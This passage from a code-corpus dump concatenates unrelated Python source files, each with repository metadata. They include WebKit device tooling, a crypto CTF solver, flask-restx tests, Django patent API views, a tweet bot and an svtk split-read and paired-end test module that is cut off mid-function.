| 32.309524 | 100 | 0.733972 | [
"Apache-2.0"
] | Ali-Homsi/githubrepo | setup.py | 1,357 | Python |
# Copyright (C) 2017-2019 Apple Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY APPLE INC. AND ITS CONTRIBUTORS ``AS IS'' AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL APPLE INC. OR ITS CONTRIBUTORS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import socket
class Device(object):
def __init__(self, platform_device):
self.platform_device = platform_device
self.listening_socket = None
def listening_port(self):
if not self.listening_socket:
return None
return self.listening_socket.getsockname()[1]
def install_app(self, app_path, env=None):
return self.platform_device.install_app(app_path, env)
def install_dylibs(self, path_to_dylibs):
if hasattr(self.platform_device, 'install_dylibs'):
return self.platform_device.install_dylibs(path_to_dylibs=path_to_dylibs)
return True
def launch_app(self, bundle_id, args, env=None):
return self.platform_device.launch_app(bundle_id, args, env)
def prepare_for_testing(self, ports_to_forward, test_app_bundle_id, layout_test_directory):
if not self.listening_socket:
self.listening_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.listening_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.listening_socket.bind(('127.0.0.1', 0))
if hasattr(self.platform_device, 'prepare_for_testing'):
self.platform_device.prepare_for_testing(
ports_to_forward=ports_to_forward + [self.listening_port()],
test_app_bundle_id=test_app_bundle_id,
layout_test_directory=layout_test_directory,
)
def finished_testing(self):
if hasattr(self.platform_device, 'finished_testing'):
self.platform_device.finished_testing()
self.listening_socket = None
def symbolicate_crash_log_if_needed(self, path):
if hasattr(self.platform_device, 'symbolicate_crash_log_if_needed'):
return self.platform_device.symbolicate_crash_log_if_needed(path)
return self.filesystem.read_text_file(path)
def release_worker_resources(self):
if hasattr(self.platform_device, 'release_worker_resources'):
return self.platform_device.release_worker_resources()
return None
@property
def executive(self):
return self.platform_device.executive
@property
def filesystem(self):
return self.platform_device.filesystem
@property
def user(self):
return self.platform_device.user
@property
def platform(self):
return self.platform_device.platform
@property
def workspace(self):
return self.platform_device.workspace
@property
def udid(self):
return self.platform_device.udid
@property
def device_type(self):
return self.platform_device.device_type
@property
def build_version(self):
return self.platform_device.build_version
def __nonzero__(self):
return self.platform_device is not None
def __eq__(self, other):
return self.udid == other.udid
def __ne__(self, other):
return not self.__eq__(other)
def __repr__(self):
return u'{}'.format(self.platform_device)
def __hash__(self):
return hash(self.udid)
| 36.5 | 95 | 0.715922 | [
"BSD-2-Clause"
] | jacadcaps/webkitty | Tools/Scripts/webkitpy/port/device.py | 4,453 | Python |
out = "281 547 54 380 392 98 158 440 724 218 406 672 193 457 694 208 455 745 196 450 724".split(" ")
out = [int(x) for x in out]
exec('def f(x):'+'yield((x:=-~x)*x+-~-x)%727;'*100)
for i in range(727):
g=f(i)
a = (list([*map(lambda c:c^next(g),out)]))
if all([x < 128 for x in a]):
print(i)
print("".join([chr(x) for x in a]))
| 28.583333 | 100 | 0.559767 | [
"MIT"
] | NoXLaw/RaRCTF2021-Challenges-Public | crypto/minigen/solve.py | 343 | Python |
import datetime
from datetime import timedelta
import csv
from module.stock import Stock, Market
# Historic Files
DAX = 'DAX.csv'
DOW = 'Dow.csv'
FTSE = 'FTSE.csv'
# Output File
OUTPUT = 'output.txt'
def import_csv(file_name):
data = []
with open(file_name) as file:
reader = csv.reader(file)
data = list(reader)
return(data)
# Import historic stock performance
Dax_data = import_csv(DAX)
Dow_data = import_csv(DOW)
Ftse_data = import_csv(FTSE)
Ftse = Market('FTSE', Ftse_data)
Ftse.p.sort(key=lambda x: x.d, reverse=False) # Sorts into date order
vanguard = Stock('Vanguard', 1, 100000) # Name, price, units
vanguard.sim(Ftse, datetime.date(2007, 1, 1), datetime.date(2012, 1, 1))
print(vanguard.v)
''' Simulation '''
'''for i in range(0,1000):
Ftse = Market('Random', [])
Ftse.p.sort(key=lambda x: x.d, reverse=False)
vanguard = Stock('Vanguard', 1, 100000) # Name, price, units
vanguard.sim(Ftse, datetime.date(2019, 2, 1), datetime.date(2022, 1, 1))
print(vanguard.v)
if(vanguard.v > 100000):
break
'''
| 25.761905 | 76 | 0.666359 | [
"MIT"
] | Mooseymax/Market_Simulator | d.py | 1,082 | Python |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import flask
from flask import Blueprint, request
import flask_restx as restx
# Add a dummy Resource to verify that the app is properly set.
class HelloWorld(restx.Resource):
def get(self):
return {}
class GoodbyeWorld(restx.Resource):
def __init__(self, err):
self.err = err
def get(self):
flask.abort(self.err)
class APIWithBlueprintTest(object):
def test_api_base(self, app):
blueprint = Blueprint('test', __name__)
api = restx.Api(blueprint)
app.register_blueprint(blueprint)
assert api.urls == {}
assert api.prefix == ''
assert api.default_mediatype == 'application/json'
def test_api_delayed_initialization(self, app):
blueprint = Blueprint('test', __name__)
api = restx.Api()
api.init_app(blueprint)
app.register_blueprint(blueprint)
api.add_resource(HelloWorld, '/', endpoint="hello")
def test_add_resource_endpoint(self, app, mocker):
blueprint = Blueprint('test', __name__)
api = restx.Api(blueprint)
view = mocker.Mock(**{'as_view.return_value.__name__': str('test_view')})
api.add_resource(view, '/foo', endpoint='bar')
app.register_blueprint(blueprint)
view.as_view.assert_called_with('bar', api)
def test_add_resource_endpoint_after_registration(self, app, mocker):
blueprint = Blueprint('test', __name__)
api = restx.Api(blueprint)
app.register_blueprint(blueprint)
view = mocker.Mock(**{'as_view.return_value.__name__': str('test_view')})
api.add_resource(view, '/foo', endpoint='bar')
view.as_view.assert_called_with('bar', api)
def test_url_with_api_prefix(self, app):
blueprint = Blueprint('test', __name__)
api = restx.Api(blueprint, prefix='/api')
api.add_resource(HelloWorld, '/hi', endpoint='hello')
app.register_blueprint(blueprint)
with app.test_request_context('/api/hi'):
assert request.endpoint == 'test.hello'
def test_url_with_blueprint_prefix(self, app):
blueprint = Blueprint('test', __name__, url_prefix='/bp')
api = restx.Api(blueprint)
api.add_resource(HelloWorld, '/hi', endpoint='hello')
app.register_blueprint(blueprint)
with app.test_request_context('/bp/hi'):
assert request.endpoint == 'test.hello'
def test_url_with_registration_prefix(self, app):
blueprint = Blueprint('test', __name__)
api = restx.Api(blueprint)
api.add_resource(HelloWorld, '/hi', endpoint='hello')
app.register_blueprint(blueprint, url_prefix='/reg')
with app.test_request_context('/reg/hi'):
assert request.endpoint == 'test.hello'
def test_registration_prefix_overrides_blueprint_prefix(self, app):
blueprint = Blueprint('test', __name__, url_prefix='/bp')
api = restx.Api(blueprint)
api.add_resource(HelloWorld, '/hi', endpoint='hello')
app.register_blueprint(blueprint, url_prefix='/reg')
with app.test_request_context('/reg/hi'):
assert request.endpoint == 'test.hello'
def test_url_with_api_and_blueprint_prefix(self, app):
blueprint = Blueprint('test', __name__, url_prefix='/bp')
api = restx.Api(blueprint, prefix='/api')
api.add_resource(HelloWorld, '/hi', endpoint='hello')
app.register_blueprint(blueprint)
with app.test_request_context('/bp/api/hi'):
assert request.endpoint == 'test.hello'
def test_error_routing(self, app, mocker):
blueprint = Blueprint('test', __name__)
api = restx.Api(blueprint)
api.add_resource(HelloWorld, '/hi', endpoint="hello")
api.add_resource(GoodbyeWorld(404), '/bye', endpoint="bye")
app.register_blueprint(blueprint)
with app.test_request_context('/hi', method='POST'):
assert api._should_use_fr_error_handler() is True
assert api._has_fr_route() is True
with app.test_request_context('/bye'):
api._should_use_fr_error_handler = mocker.Mock(return_value=False)
assert api._has_fr_route() is True
def test_non_blueprint_rest_error_routing(self, app, mocker):
blueprint = Blueprint('test', __name__)
api = restx.Api(blueprint)
api.add_resource(HelloWorld, '/hi', endpoint="hello")
api.add_resource(GoodbyeWorld(404), '/bye', endpoint="bye")
app.register_blueprint(blueprint, url_prefix='/blueprint')
api2 = restx.Api(app)
api2.add_resource(HelloWorld(api), '/hi', endpoint="hello")
api2.add_resource(GoodbyeWorld(404), '/bye', endpoint="bye")
with app.test_request_context('/hi', method='POST'):
assert api._should_use_fr_error_handler() is False
assert api2._should_use_fr_error_handler() is True
assert api._has_fr_route() is False
assert api2._has_fr_route() is True
with app.test_request_context('/blueprint/hi', method='POST'):
assert api._should_use_fr_error_handler() is True
assert api2._should_use_fr_error_handler() is False
assert api._has_fr_route() is True
assert api2._has_fr_route() is False
api._should_use_fr_error_handler = mocker.Mock(return_value=False)
api2._should_use_fr_error_handler = mocker.Mock(return_value=False)
with app.test_request_context('/bye'):
assert api._has_fr_route() is False
assert api2._has_fr_route() is True
with app.test_request_context('/blueprint/bye'):
assert api._has_fr_route() is True
assert api2._has_fr_route() is False
def test_non_blueprint_non_rest_error_routing(self, app, mocker):
blueprint = Blueprint('test', __name__)
api = restx.Api(blueprint)
api.add_resource(HelloWorld, '/hi', endpoint="hello")
api.add_resource(GoodbyeWorld(404), '/bye', endpoint="bye")
app.register_blueprint(blueprint, url_prefix='/blueprint')
@app.route('/hi')
def hi():
return 'hi'
@app.route('/bye')
def bye():
flask.abort(404)
with app.test_request_context('/hi', method='POST'):
assert api._should_use_fr_error_handler() is False
assert api._has_fr_route() is False
with app.test_request_context('/blueprint/hi', method='POST'):
assert api._should_use_fr_error_handler() is True
assert api._has_fr_route() is True
api._should_use_fr_error_handler = mocker.Mock(return_value=False)
with app.test_request_context('/bye'):
assert api._has_fr_route() is False
with app.test_request_context('/blueprint/bye'):
assert api._has_fr_route() is True
| 42.447853 | 81 | 0.655731 | [
"BSD-3-Clause"
] | SteadBytes/flask-restx | tests/legacy/test_api_with_blueprint.py | 6,919 | Python |
#!/usr/bin/python3
import importlib
import os
import getpass
import pip
from crontab import CronTab
if int(pip.__version__.split('.')[0])>9:
from pip._internal import main as pipmain
else:
from pip import main as pipmain
def check_modules():
packages = {"docx" : "python-docx",
"googleapiclient" : "google-api-python-client",
"google_auth_oauthlib" : "google_auth_oauthlib",
"crontab" : "python-crontab"
}
for ky, vl in packages.items():
spam_spec = importlib.util.find_spec(ky)
if spam_spec is None:
pipmain(['install', vl])
class useCronTab(object):
def __init__(self):
usr_name = getpass.getuser()
self.my_cron = CronTab(user=usr_name)
abs_path = os.path.dirname(os.path.realpath(__file__))
self.commnd = abs_path + "src/agenda "
def set_job(self, date, featur):
job = self.my_cron.new(command=self.commnd+featur)
job.setall(date)
def __del__(self):
self.my_cron.write()
def import_package():
import py_compile
py_modules = ["cal_setup.py",
"classEvent.py",
"datesGenerator.py",
"intrctCalendar.py",
"intrctDrive.py",
"readDocxFile.py",
"getNotification.py"
]
for pckg in py_modules:
py_compile.compile(pckg)
if __name__ == '__main__':
abs_path = os.path.dirname(os.path.realpath(__file__))
os.chdir(abs_path)
print("Installing missing modules")
check_modules()
print("Compiling .py files")
import_package()
features = {"today" : "-d",
"tomorrow" : "-t",
"week" : "-w",
"month" : "-m"
}
automatize = input("Do you want to automitize executation? [y]/[n]: ")
cron = useCronTab()
while automatize == 'y':
feature = input("Dates to update automaticaly? [today]/[tomorrow]/[week]/[month]: ")
print("\n Select the day: \n"
+ "-----------------------\n"
+ "dow: day of week (0-6 Sun-Sat)\n"
+ "mon: Month (1-12 Jan-Dec)\n"
+ "dom: day of month (1-31)\n"
+ "hh: hour (00-23)\n"
+ "mm: minute (00-59)\n"
+ "Use * for any\n")
date = input("Select date [mm hh dom mon dow]: ")
cron.set_job(date, features[feature])
automatize = input("Any more automatization? [y]/[n]:")
del cron
| 24.018692 | 92 | 0.538521 | [
"Apache-2.0"
] | Jaimedgp/Master-Schedule | src/install.py | 2,570 | Python |
# pyOCD debugger
# Copyright (c) 2019 Arm Limited
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
from collections import namedtuple
from . import target_kinetis
FamilyInfo = namedtuple("FamilyInfo", "vendor matches klass")
## @brief Lookup table to convert from CMSIS-Pack family names to a family class.
#
# The vendor name must be an exact match to the 'Dvendor' attribute of the CMSIS-Pack family
# element.
#
# At least one of the regexes must match the entirety of either the CMSIS-Pack 'Dfamily' or
# 'DsubFamily' (if present) attributes.
FAMILIES = [
FamilyInfo("NXP", [re.compile(r'MK[LEVWS]?.*')], target_kinetis.Kinetis),
]
| 35.529412 | 92 | 0.740066 | [
"Apache-2.0"
] | ARMmbed/pyOCD-Samsung | pyocd/target/family/__init__.py | 1,208 | Python |
import argparse
import RDT
import time
import rdt_3_0
def makePigLatin(word):
m = len(word)
vowels = "a", "e", "i", "o", "u", "y"
if m < 3 or word == "the":
return word
else:
for i in vowels:
if word.find(i) < m and word.find(i) != -1:
m = word.find(i)
if m == 0:
return word + "way"
else:
return word[m:] + word[:m] + "ay"
def piglatinize(message):
essagemay = ""
message = message.strip(".")
for word in message.split(' '):
essagemay += " " + makePigLatin(word)
return essagemay.strip() + "."
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Pig Latin conversion server.')
parser.add_argument('port', help='Port.', type=int)
args = parser.parse_args()
timeout = 5 # close connection if no new data within 5 seconds
time_of_last_data = time.time()
rdt = rdt_3_0.RDT('server', None, args.port)
while (True):
# try to receiver message before timeout
# msg_S = rdt.rdt_2_1_receive()
msg_S = rdt.rdt_3_0_receive()
if msg_S is None:
if time_of_last_data + timeout < time.time():
break
else:
continue
time_of_last_data = time.time()
# convert and reply
rep_msg_S = piglatinize(msg_S)
print('Converted %s \nto \n%s\n' % (msg_S, rep_msg_S))
# rdt.rdt_2_1_send(rep_msg_S)
rdt.rdt_3_0_send(rep_msg_S)
rdt.disconnect()
| 27.410714 | 80 | 0.565472 | [
"Apache-2.0"
] | AlexHarry17/CSCI466Project2 | submission_files/server_3_0.py | 1,535 | Python |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .catalog_item import CatalogItem
class USqlExternalDataSource(CatalogItem):
"""A Data Lake Analytics catalog U-SQL external datasource item.
:param compute_account_name: the name of the Data Lake Analytics account.
:type compute_account_name: str
:param version: the version of the catalog item.
:type version: str
:param database_name: the name of the database.
:type database_name: str
:param name: the name of the external data source.
:type name: str
:param provider: the name of the provider for the external data source.
:type provider: str
:param provider_string: the name of the provider string for the external
data source.
:type provider_string: str
:param pushdown_types: the list of types to push down from the external
data source.
:type pushdown_types: list of str
"""
_attribute_map = {
'compute_account_name': {'key': 'computeAccountName', 'type': 'str'},
'version': {'key': 'version', 'type': 'str'},
'database_name': {'key': 'databaseName', 'type': 'str'},
'name': {'key': 'externalDataSourceName', 'type': 'str'},
'provider': {'key': 'provider', 'type': 'str'},
'provider_string': {'key': 'providerString', 'type': 'str'},
'pushdown_types': {'key': 'pushdownTypes', 'type': '[str]'},
}
def __init__(self, compute_account_name=None, version=None, database_name=None, name=None, provider=None, provider_string=None, pushdown_types=None):
super(USqlExternalDataSource, self).__init__(compute_account_name=compute_account_name, version=version)
self.database_name = database_name
self.name = name
self.provider = provider
self.provider_string = provider_string
self.pushdown_types = pushdown_types
| 44.132075 | 154 | 0.632322 | [
"Unlicense",
"MIT"
] | amcclead7336/Enterprise_Data_Science_Final | venv/lib/python3.8/site-packages/azure/mgmt/datalake/analytics/catalog/models/usql_external_data_source.py | 2,339 | Python |
# This module just exists as a shortcut for running the main Kivy app
if __name__ == '__main__':
from naturtag.app.app import NaturtagApp
NaturtagApp().run()
| 27.833333 | 69 | 0.730539 | [
"MIT"
] | JWCook/naturtag | naturtag/ui.py | 167 | Python |
from django_filters.rest_framework import DjangoFilterBackend, FilterSet
from rest_framework import generics, viewsets, permissions
from rest_framework import filters
from drf_haystack.viewsets import HaystackViewSet
from drf_haystack.filters import HaystackAutocompleteFilter
from drf_haystack.serializers import HaystackSerializer
from patents.models import Patent
from .serializers import PatentSerializer, PatentDetailSerializer, \
PatentIndexSerializer, AutocompleteSerializer
class PatentListViewSet(viewsets.ModelViewSet):
queryset = Patent.objects.all().order_by('publication_number')
serializer_class = PatentSerializer
permission_classes = [permissions.IsAuthenticated]
filter_backends = [filters.SearchFilter]
search_fields = ['title', 'abstract', 'claims']
class PatentListAPIView(generics.ListAPIView):
queryset = Patent.objects.all()
serializer_class = PatentSerializer
permission_classes = [permissions.IsAuthenticated]
class PatentDetailAPIView(generics.RetrieveAPIView):
queryset = Patent.objects.all()
serializer_class = PatentDetailSerializer
permission_classes = [permissions.IsAuthenticated]
class PatentCreateAPIView(generics.CreateAPIView):
queryset = Patent.objects.all()
serializer_class = PatentDetailSerializer
permission_classes = [permissions.IsAuthenticated]
class PatentUpdateAPIView(generics.UpdateAPIView):
queryset = Patent.objects.all()
serializer_class = PatentDetailSerializer
permission_classes = [permissions.IsAuthenticated]
class PatentDeleteAPIView(generics.DestroyAPIView):
queryset = Patent.objects.all()
serializer_class = PatentSerializer
permission_classes = [permissions.IsAuthenticated]
class PatentFilter(FilterSet):
class Meta:
model = Patent
fields = ['publication_number', 'title', 'abstract', 'claims']
class PatentListFilterAPIView(generics.ListAPIView):
queryset = Patent.objects.all()
serializer_class = PatentSerializer
filter_backends = [DjangoFilterBackend]
filterset_class = PatentFilter
permission_classes = [permissions.IsAuthenticated]
class PatentSearchViewSet(HaystackViewSet):
index_models = [Patent]
serializer_class = PatentIndexSerializer
permission_classes = [permissions.IsAuthenticated]
class AutocompleteSearchViewSet(HaystackViewSet):
index_models = [Patent]
serializer_class = AutocompleteSerializer
filter_backends = [HaystackAutocompleteFilter]
permission_classes = [permissions.IsAuthenticated]
| 33.565789 | 72 | 0.79459 | [
"MIT"
] | KimHS0915/python-django-patents | api/views.py | 2,551 | Python |
#!C:\Users\John\PycharmProjects\arcadePython\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==10.0.1','console_scripts','pip3.6'
__requires__ = 'pip==10.0.1'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==10.0.1', 'console_scripts', 'pip3.6')()
)
| 32.384615 | 70 | 0.672209 | [
"MIT"
] | JohnWJackson/arcadePython | venv/Scripts/pip3.6-script.py | 421 | Python |
from .shell import ShellRunner
from .printonly import PrintOnlyRunner
| 23.333333 | 38 | 0.857143 | [
"Apache-2.0"
] | 7-RED/connectedhomeip | scripts/build/runner/__init__.py | 70 | Python |
from django.db import models
from osc_bge.users import models as user_models
# Create your models here.
class TimeStampedModel(models.Model):
created_at = models.DateTimeField(auto_now_add=True, null=True)
updated_at = models.DateTimeField(auto_now=True, null=True)
class Meta:
abstract = True
#Agent Head Table
class AgencyHead(TimeStampedModel):
PROGRAM_CHOICES = (
('secondary', 'Secondary'),
('college', 'College'),
('camp', 'Camp'),
)
name = models.CharField(max_length=80, null=True, blank=True)
location = models.CharField(max_length=140, null=True, blank=True)
number_branches = models.CharField(max_length=80, null=True, blank=True)
capacity_students = models.CharField(max_length=255, null=True, blank=True)
commission = models.CharField(max_length=140, null=True, blank=True)
promotion = models.CharField(max_length=255, null=True, blank=True)
others = models.CharField(max_length=255, null=True, blank=True)
comment = models.TextField(null=True, blank=True)
def __str__(self):
return "{}".format(self.name)
class AgencyProgram(TimeStampedModel):
head = models.ForeignKey(AgencyHead, on_delete=models.CASCADE, null=True)
program = models.CharField(max_length=80, null=True, blank=True)
#Agent Branch Table
class Agency(TimeStampedModel):
head = models.ForeignKey(AgencyHead, on_delete=models.CASCADE, null=True, related_name='agent_branch')
name = models.CharField(max_length=140, null=True, blank=True)
location = models.CharField(max_length=140, null=True, blank=True)
capacity_students = models.CharField(max_length=255, null=True, blank=True)
commission = models.CharField(max_length=140, null=True, blank=True)
promotion = models.CharField(max_length=255, null=True, blank=True)
others = models.CharField(max_length=255, null=True, blank=True)
comment = models.TextField(null=True, blank=True)
def __str__(self):
return "{}".format(self.name)
class AgencyBranchProgram(TimeStampedModel):
branch = models.ForeignKey(Agency, on_delete=models.CASCADE, null=True)
program = models.CharField(max_length=80, null=True, blank=True)
def set_filename_format(now, instance, filename):
return "{schoolname}-{microsecond}".format(
agentname=instance.agency,
microsecond=now.microsecond,
)
def agent_directory_path(instance, filename):
now = datetime.datetime.now()
path = "agents/{agentname}/{filename}".format(
agentname=instance.agency,
filename=set_filename_format(now, instance, filename),
)
return path
class AgencyHeadContactInfo(TimeStampedModel):
LEVEL_CHOICES = (
('s', 'S'),
('a', 'A'),
('b', 'B'),
('c', 'C'),
('d', 'D'),
)
agent = models.ForeignKey(AgencyHead, on_delete=models.CASCADE, null=True)
name = models.CharField(max_length=80, null=True, blank=True)
contracted_date = models.DateTimeField(auto_now=True, null=True)
phone = models.CharField(max_length=80, null=True, blank=True)
email = models.CharField(max_length=140, null=True, blank=True)
skype = models.CharField(max_length=80, null=True, blank=True)
wechat = models.CharField(max_length=80, null=True, blank=True)
location = models.CharField(max_length=140, null=True, blank=True)
level = models.CharField(max_length=80, null=True, blank=True)
image = models.ImageField(upload_to=agent_directory_path, null=True, blank=True)
def __str__(self):
return "{}".format(self.name)
class AgentRelationshipHistory(TimeStampedModel):
head = models.ForeignKey(AgencyHead, on_delete=models.CASCADE, null=True)
writer = models.CharField(max_length=80, null=True, blank=True)
name = models.CharField(max_length=80, null=True, blank=True)
date = models.DateField(null=True, blank=True)
location = models.CharField(max_length=140, null=True, blank=True)
category = models.CharField(max_length=80, null=True, blank=True)
priority = models.IntegerField(null=True, blank=True)
comment = models.TextField(null=True, blank=True)
class SecodnaryProgram(TimeStampedModel):
agent = models.ForeignKey(AgencyHead, on_delete=models.CASCADE, null=True)
preriod = models.CharField(max_length=80, null=True, blank=True)
target = models.IntegerField(null=True, blank=True)
new_students_fall = models.IntegerField(null=True, blank=True)
new_students_spring = models.IntegerField(null=True, blank=True)
total_new_students_bge = models.IntegerField(null=True, blank=True)
total_students_bge = models.IntegerField(null=True, blank=True)
terminating_students = models.IntegerField(null=True, blank=True)
comments = models.TextField(null=True, blank=True)
class Camp(TimeStampedModel):
agent = models.ForeignKey(AgencyHead, on_delete=models.CASCADE, null=True)
preriod = models.CharField(max_length=80, null=True, blank=True)
target = models.IntegerField(null=True, blank=True)
summer_camp = models.IntegerField(null=True, blank=True)
winter_camp = models.IntegerField(null=True, blank=True)
comments = models.TextField(null=True, blank=True)
class CollegeApplication(TimeStampedModel):
agent = models.ForeignKey(AgencyHead, on_delete=models.CASCADE, null=True)
preriod = models.CharField(max_length=80, null=True, blank=True)
college_application = models.IntegerField(null=True, blank=True)
other_program = models.IntegerField(null=True, blank=True)
comments = models.TextField(null=True, blank=True)
| 38.696552 | 106 | 0.724826 | [
"MIT"
] | jisuhan3201/osc-bge | osc_bge/agent/models.py | 5,611 | Python |
'''
First Version: Tweets contents from subreddits
'''
from time import sleep
from reddit import Reddit
from twitter import Twitter
def main():
'''
connects the pieces to grab posts from reddit and throw them on twitter
'''
reddit = Reddit()
twitter = Twitter()
tweets = reddit.get_tweets()
print("sending {} tweets".format(len(tweets)))
for tweet in reddit.get_tweets():
status = twitter.send_tweet(tweet.Primary)
if tweet.Second:
twitter.send_tweet(tweet.Second, status.id)
sleep(90)
if __name__ == '__main__':
main()
| 22.923077 | 75 | 0.65604 | [
"MIT"
] | seanneal/tweetbot | tweet_bot.py | 596 | Python |
import sys
import json
from rule_gens import RulesForGeneration
from generate_text import generating_player_text_from_templates, generating_team_text_from_templates
from transformers import GPT2Tokenizer
print("Constructing main file ....")
test_preds = []
js = json.load(open(f'./data/jsons/2018_w_opp.json', 'r'))
tokenizer = GPT2Tokenizer.from_pretrained('gpt2')
rfg = RulesForGeneration()
print("Constructed!!\n\n")
for game_idx in range(len(js)):
# if game_idx == 0:
team_stat = generating_team_text_from_templates(js, game_idx, tokenizer)
player_stat = generating_player_text_from_templates(js, game_idx, tokenizer)
sol = [rfg.generate_defeat_sentence(js[game_idx]).strip()]
for k, v in team_stat.items():
sol.append(v.strip())
for k, v in player_stat.items():
sol.append(v.strip())
sol.append(rfg.generate_next_game_sentence(js[game_idx]).strip())
final_sol = ' '.join(sol)
if game_idx % 10 == 0:
print()
print(game_idx, final_sol)
test_preds.append(final_sol)
with open(f'./output/{sys.argv[1]}', 'w') as f:
f.write('\n'.join(test_preds))
| 27.071429 | 100 | 0.708883 | [
"MIT"
] | ashishu007/data2text-cbr | src/final_gen.py | 1,137 | Python |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright © 2017 Matthew Stone <[email protected]>
# Distributed under terms of the MIT license.
"""
Calculate enrichment of clipped reads or discordant pairs at SV breakpoints.
"""
import argparse
import sys
import pysam
import pandas as pd
from svtk.pesr import SRTestRunner, PETestRunner, PETest, SRTest
def sr_test(argv):
parser = argparse.ArgumentParser(
description="Calculate enrichment of clipped reads at SV breakpoints.",
prog='svtk sr-test',
formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument('vcf',
help='VCF of variant calls. Standardized to include '
'CHR2, END, SVTYPE, STRANDS in INFO.')
parser.add_argument('countfile', help='Tabix indexed file of split counts.'
' Columns: chrom,pos,clip,count,sample')
parser.add_argument('fout',
help='Output table of most significant start/end'
'positions.')
parser.add_argument('-w', '--window', type=int, default=100,
help='Window around variant start/end to consider for '
'split read support. [100]')
parser.add_argument('--common', default=False,
action='store_true', help='Ignore background for common AF')
parser.add_argument('-b', '--background', type=int, default=160,
help='Number of background samples to choose for '
'comparison in t-test. [160]')
parser.add_argument('-s', '--samples', type=argparse.FileType('r'),
default=None,
help='Whitelist of samples to restrict testing to.')
parser.add_argument('--index', default=None,
help='Tabix index of discordant pair file. Required if '
'discordant pair file is hosted remotely.')
# TODO: add normalization
parser.add_argument('--medianfile', default=None,
help='Median coverage statistics for each library '
'(optional). If provided, each sample\'s split '
'counts will be normalized accordingly. '
'Same format as RdTest, one column per sample.')
parser.add_argument('--log', action='store_true', default=False,
help='Print progress log to stderr.')
# Print help if no arguments specified
if len(argv) == 0:
parser.print_help()
sys.exit(1)
args = parser.parse_args(argv)
vcf = pysam.VariantFile(args.vcf)
if args.index is not None:
countfile = pysam.TabixFile(args.countfile, index=args.index,
parser=pysam.asTuple())
else:
if args.countfile.startswith('http'):
raise Exception('Must provide tabix index with remote URL')
countfile = pysam.TabixFile(args.countfile, parser=pysam.asTuple())
if args.fout in '- stdout'.split():
fout = sys.stdout
else:
fout = open(args.fout, 'w')
header = 'name coord pos log_pval called_median bg_median bg_frac'.split()
fout.write('\t'.join(header) + '\n')
if args.samples is not None:
whitelist = [s.strip() for s in args.samples.readlines()]
else:
whitelist = None
if args.medianfile is not None:
medians = pd.read_table(args.medianfile)
medians = pd.melt(medians, var_name='sample', value_name='median_cov')
else:
medians = None
runner = SRTestRunner(vcf, countfile, fout, args.background, args.common,
args.window, whitelist, medians=medians, log=args.log)
runner.run()
def pe_test(argv):
parser = argparse.ArgumentParser(
description="Calculate enrichment of discordant pairs at SV breakpoints.",
prog='svtk pe-test',
formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument('vcf', help='Variants.')
parser.add_argument('disc', help='Table of discordant pair coordinates.')
parser.add_argument('fout', type=argparse.FileType('w'),
help='Output table of PE counts.')
parser.add_argument('-o', '--window-out', type=int, default=500,
help='Window outside breakpoint to query for '
'discordant pairs. [500]')
parser.add_argument('-i', '--window-in', type=int, default=50,
help='Window inside breakpoint to query for '
'discordant pairs. [50]')
parser.add_argument('-b', '--background', type=int, default=160,
help='Number of background samples to sample for PE '
'evidence. [160]')
parser.add_argument('--common', default=False,
action='store_true', help='Ignore background for common AF')
parser.add_argument('-s', '--samples', type=argparse.FileType('r'),
default=None,
help='Whitelist of samples to restrict testing to.')
parser.add_argument('--index', default=None,
help='Tabix index of discordant pair file. Required if '
'discordant pair file is hosted remotely.')
parser.add_argument('--medianfile', default=None,
help='Median coverage statistics for each library '
'(optional). If provided, each sample\'s split '
'counts will be normalized accordingly. '
'Same format as RdTest, one column per sample.')
parser.add_argument('--log', action='store_true', default=False,
help='Print progress log to stderr.')
if len(argv) == 0:
parser.print_help()
sys.exit(1)
args = parser.parse_args(argv)
if args.vcf in '- stdin'.split():
vcf = pysam.VariantFile(sys.stdin)
else:
vcf = pysam.VariantFile(args.vcf)
if args.fout in '- stdout'.split():
fout = sys.stdout
else:
fout = args.fout
